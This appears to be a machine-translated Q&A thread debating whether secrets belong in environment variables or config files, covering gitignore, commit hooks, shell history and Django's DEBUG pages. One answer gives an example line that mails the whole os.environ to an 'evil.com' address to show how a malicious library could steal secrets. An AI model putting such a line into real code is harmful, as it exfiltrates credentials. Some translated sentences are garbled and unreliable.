Parolaları yapılandırma dosyalarında ortam değişkenleri (düz metin yerine) olarak saklamak güvenli midir?

Raylar, django (ve biraz da php) içinde birkaç uygulama üzerinde çalışıyorum ve bazılarında yapmaya başladığım şeylerden biri, belirli yapılandırma dosyalarında düz metin yerine ortam değişkenleri olarak veritabanı ve diğer parolaları depolamaktır ( django uygulamaları için settings.py içinde).

Bunu iş arkadaşlarımdan biriyle tartışırken, bunun kötü bir uygulama olduğunu - belki de bunun ilk bakışta göründüğü kadar tamamen güvenli olmadığını öne sürdü.

Öyleyse, bilmek istiyorum - bu güvenli bir uygulama mı? Şifreleri bu dosyalarda düz metin olarak saklamak daha mı güvenli?

Daha teorik bir düzeyde, güvenlik düzeylerini aşağıdaki şekillerde düşünme eğilimindeyim (gücü artırmak için):

• Güvenlik yok. Düz metin. Nereye bakacağını bilen herkes verilere erişebilir.
• Gizleme ile Güvenlik. Verileri (düz metin), bir ortam değişkeni gibi zor bir yerde veya bir yapılandırma dosyası gibi görünmesi gereken bir dosyada saklarsınız. Bir saldırgan eninde sonunda neler olup bittiğini anlar ya da onunla karşılaşacaktır.
• Kırılması önemsiz olan şifreleme ile sağlanan güvenlik (sezar şifresini düşünün!).
• Bazı çabalarla kırılabilen şifreleme ile sağlanan güvenlik.
• Mevcut donanımda kırılması pratik olmayan şifreleme ile sağlanan güvenlik.
• En güvenli sistem, kimsenin kullanamayacağı bir sistemdir! :)

Ortam değişkenleri, düz metin dosyalarından daha güvenlidir, çünkü bunlar geçici / tek kullanımlıktır, kaydedilmez; Örneğin, "set pwd = her neyse" gibi yalnızca bir yerel ortam değişkeni ayarlarsanız ve sonra komut kabuğunuzdan komut dosyasının sonunda çıkan bir şeyle betiği çalıştırırsanız, değişken artık mevcut değildir. Durumunuz ilk ikisine giriyor, ki bu oldukça güvensiz. Bunu yapacak olsaydınız, hemen intranet / ev ağınızın dışına ve sonra da yalnızca test amacıyla dağıtmanızı tavsiye etmem.

Daha önce belirtildiği gibi, her iki yöntem de sisteminizin güvenliği ihlal edildiğinde herhangi bir ek "güvenlik" katmanı sağlamaz. Ortam değişkenlerini tercih etmenin en güçlü nedenlerinden birinin sürüm kontrolü olduğuna inanıyorum : GIT gibi sürüm kontrol sisteminde kazara depolanan çok fazla veritabanı yapılandırması, vs. ben de öyle ...).

Şifrelerinizin dosyalarda saklanmaması, sürüm kontrol sisteminde saklanmalarını imkansız kılar.

Ne zaman bir şifre kaydetmeniz gerekiyorsa, bu güvensizdir. Dönem. Şifrelenmemiş bir parolayı güvenli bir şekilde saklamanın bir yolu yoktur. Şimdi hangi ortam değişkenlerine karşı yapılandırma dosyalarının daha "güvenli" olduğu tartışmaya açık olabilir. IMHO, eğer sisteminizin güvenliği ihlal edilirse, nerede saklandığı gerçekten önemli değildir, gayretli bir bilgisayar korsanı onu bulabilir.

Maalesef yorum yapacak yeterli temsilcim yoktu, ancak dikkatli değilseniz, kabuğunuzun bu şifreyi komut geçmişinde de yakalayabileceğini eklemek istedim. Yani $ pwd=mypassword my_progmanuel olarak bir şeyi çalıştırmak , umduğunuz kadar geçici değildir.

Mümkün olduğunda kimlik bilgilerinizi ortam değişkenleri olarak değil, gitignored bir dosyada saklamanız gerektiğini düşünüyorum.

Kimlik bilgilerini bir dosyaya karşı ENV (ortam) değişkenlerinde saklarken göz önünde bulundurulması gereken şeylerden biri, ENV değişkenlerinin kullandığınız herhangi bir kitaplık veya bağımlılık tarafından çok kolay bir şekilde incelenebilmesidir.

Bu kötü niyetle yapılabilir veya yapılmayabilir. Örneğin, bir kütüphane yazarı hata ayıklama için yığın izlerini ve ENV değişkenlerini kendilerine e-postayla gönderebilir (en iyi uygulama değildir, ancak yapmak mümkündür).

Kimlik bilgileriniz bir dosyadaysa, onlara ulaşmak çok daha zordur.

Özellikle, düğümdeki bir npm'yi düşünün. Bir npm'nin, eğer ENV'de iseler kimlik bilgilerinize bakması basit bir meseledir process.ENV. Öte yandan bir dosyadaysa, çok daha fazla iş var.

Kimlik bilgileri dosyanızın sürüm kontrollü olup olmadığı ayrı bir sorudur. Kimlik bilgileri dosyanızı kontrol etmeyen sürüm, onu daha az kişiye ifşa eder. Tüm geliştiricilerin üretim kimlik bilgilerini bilmesine gerek yoktur. Bu, en az ayrıcalık ilkesine dayandığından, git kimlik bilgileri dosyanızı görmezden gelmenizi öneririm.

Tehdit modelinize bağlıdır.

Kullanıcılarınızın şifrelerini dosya sistemlerinde unutulabilecekleri ve yanlış kullanılabilecekleri yerlere serpiştirmelerini engellemeye mi çalışıyorsunuz? Öyleyse, evet, çünkü çevresel değişkenler dosyalardan daha az kalıcıdır.

Doğrudan programınızı hedef alan kötü amaçlı bir şeye karşı koruma sağlamaya mı çalışıyorsunuz? Öyleyse, hayır, çünkü ortam değişkenleri, dosyaların sahip olduğu erişim denetimi düzeyine sahip değildir.

Kişisel olarak, ihmalkar kullanıcıların motive olmuş düşmanlardan daha yaygın olduğunu düşünüyorum, bu yüzden çevre değişkeni yaklaşımını tercih ederim.

AFAICT, insanların sırları ortam değişkenlerinde saklamalarını önermelerinin iki nedeni vardır:

1. Yanlışlıkla gizli düz dosyaları bir depoya işlemek çok kolaydır. (Ve eğer halka açık bir repo ise, tost yaparsınız.)
2. Parola karmaşasını önler, yani birçok farklı proje dizini dosyasında aynı anahtara sahip olmak, geliştiriciler eninde sonunda gizli dizilerin nerede bulunduğunu izlemeyi kaybedeceklerinden, başlı başına bir güvenlik riskidir.

Bu iki sorun daha iyi yollarla çözülebilir. İlki, parola gibi görünen şeyleri kontrol eden bir git commit kancası ile çözülmelidir (örneğin, gitleaks ). Linus'un git kitaplığının kaynak koduna böyle bir araç eklemesini isterdim ama ne yazık ki bu olmadı. (Söylemeye gerek yok, gizli dosyalar her zaman eklenmelidir .gitignore, ancak birinin unutması durumunda bir kancaya ihtiyacınız var.)

İkincisi, ideal olarak salt okunur bir ortak sürücüde depolanan küresel bir şirket gizli anahtarları dosyasına sahip olarak çözülebilir. Yani Python'da buna benzer bir şeye sahip olabilirsiniz from company_secrets import *.

Daha da önemlisi, başkalarının da belirttiği gibi, ortam değişkenlerinde depolanan sırları ele geçirmek çok kolaydır. Örneğin, Python'da, bir kitaplık yazarı ekleyebilir send_email(address="evil.person@evil.com", text=json.dumps(os.environ))ve sonra bu kodu çalıştırırsanız kızardınız. Sisteminizde adlı bir dosya varsa, korsanlık çok daha zordur ~/secret_company_stuff/.my_very_secret_company_stuff.

Yalnızca Django kullanıcıları:
Django (DEBUG modunda), bir istisna varsa (DEBUG modunda) tarayıcıda bir ortam değişkeninin ham değerini gösterir. Örneğin, bir geliştirici yanlışlıkla DEBUG=Trueüretime geçerse, bu oldukça güvensiz görünüyor . Buna karşılık, Django dizeleri bakarak bullak şifre ayarları değişkenleri YAPAR API, TOKEN, KEY, SECRET, PASSveya SIGNATUREçerçevenin içinde settings.pydosyanın değişken isimlerinin.